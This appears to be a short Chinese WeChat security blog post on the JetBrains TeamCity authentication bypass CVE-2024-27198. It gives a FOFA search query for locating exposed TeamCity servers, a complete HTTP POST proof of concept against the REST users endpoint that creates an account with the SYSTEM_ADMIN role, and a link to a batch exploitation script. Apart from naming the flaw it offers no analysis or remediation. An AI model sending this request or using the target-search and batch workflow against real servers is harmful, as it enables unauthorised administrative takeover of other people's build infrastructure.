由于微信公众号推送机制改变了,快来星标不再迷路,谢谢大家!
免责声明
JetBrains TeamCity
一:漏洞描述
JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)
二:网络空间测绘查询
fofa
body="Log in to TeamCity"
三:漏洞复现
poc
POST /pwned?jsp=/app/rest/users;.jsp HTTP/1.1Host: youipUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36Accept: */*Content-Type: application/jsonAccept-Encoding: gzip, deflate{"username": "test123", "password": "test123", "email": "[email protected]","roles": {"role": [{"roleId": "SYSTEM_ADMIN", "scope": "g"}]}}
四:批量脚本获取
https://github.com/Y1-K1NG/poc_exp/tree/main/20240309JetBrains%20TeamCity%20%E8%BA%AB%E4%BB%BD%E9%AA%8C%E8%AF%81%E7%BB%95%E8%BF%87%E6%BC%8F%E6%B4%9E(CVE-2024-27198)
原文始发于微信公众号(Yi安全):JetBrains TeamCity 身份验证绕过漏洞(CVE-2024-27198)-附py
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论